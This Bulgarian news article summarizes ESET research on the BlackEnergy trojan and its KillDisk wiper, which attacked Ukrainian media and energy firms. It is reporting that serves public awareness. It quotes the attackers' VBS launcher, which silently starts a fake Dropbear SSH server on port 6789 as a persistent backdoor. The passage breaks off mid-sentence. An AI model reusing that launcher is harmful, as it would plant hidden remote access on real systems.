Троянецът BlackEnergy се завърна! Вирусът отново върлува в Украйна, като този път е още по-опасен и е насочен срещу медийния и енергийния сектор.Зловредният код е добре известен от атаките срещу множество неправителствени организации в Украйна и Полша през 2014 г. Същият вирус без използван и за шпиониране на крайни потребители.Най-новата модификация на BlackEnergy бе разкрита от изследователите на ESET в края на 2015 г. Тя отново разчита на пробойна в сигурността на операционната система, за да внедри т.нар. KillDisk компонент. Това поколение на зловредния код е използвано за атаки срещу украински медии и енергийната индустрия на страната.Веднъж активирани, вариантите на BlackEnergy Lite дават на кибер престъпника достъп до инфектираното устройство. Чрез него се потвърждава идентичността на мишената – което стартира зареждането на стандартен вариант на BlackEnergy, използван най-вече за подслушването на потребителя.
- 2015en
- khm10
- khelm
- 2015telsmi
- 2015ts
- 2015stb
- kiev_o
- brd2015
- 11131526kbp
- 02260517ee
- 03150618aaa
- 11131526trk
Предполага се, че всяка комбинация има специално значение. Например, 2015telsmi вероятно съдържа акронима SMI – Sredstva Massovoj Informacii, както и 2015en би следвало да значи – Energy. Сред по-очевидните е Kiev, чието значение е ясно.
През 2015 в кода на BlackEnergy е въведено използването на нов компонент KillDisk в продукти като Win32/KillDisk.NBB, Win32/KillDisk.NBC и Win32/KillDisk.NBD trojan. Основната му цел е да наруши целостта на определена информация на устройството. Вирусът презаписва файловете и не позволява на системата да ги възстанови в първоначалния им работещ вид.
Първият такъв случай е документиран през ноември 2015 година от CERT-UA. Той бил засечен, след като множество медии били атакувани по време на провеждащите се избори в Украйна. Цели били текстови файлове и видео материали, които били безвъзвратно заличавани от инфектираните устройства. Списъкът на файловете разширения наброява близо 4000.Figure 2KillDisk компонентът, използван при атаките на енергийната индустрия, се откроява с минимални разлики. Анализът на експертите от ESET показва следните промени в действието му:- приема команда, за да заложи точно време на активиране на зловредния код;
- изтрива Windows Event Logs: Application, Security, Setup, System;
- концентриран в премахването на много по-малко файлове – само 35.
Както в предишния случай, системата не може да възвърне старите файлове. В добавка обаче е включена функционалност, която да саботира индустриални системи. След активация вариантът на KillDisk компонента открива и спира 2 процеса със следните имена:
- komut.exe
- sec_service.exe
Приложение, представящо се за SSH сървър
След обстоен анализ на ESET бе разкрито приложение, което се представя за легитимен SSH сървър. Името, с което то присъства в системата, е Dropbear SSH. Тайният сървър се активира чрез VBS файл, който е със следното съдържание:Set WshShell = CreateObject(“WScript.Shell”)WshShell.CurrentDirectory = “C:\WINDOWS\TEMP\Dropbear\”
WshShell.Run “dropbear.exe -r rsa -d dss -a -p 6789″, 0, falseКакто става видно, с SSH сървъра се установява връзка чрез порт 6789, давайки постоянен достъп на кибер престъпниците до мрежата. Разработчиците на зловредния код са си оставили и допълнителна вратичка, в случай че по някаква причина присъствието им бъде усетено:
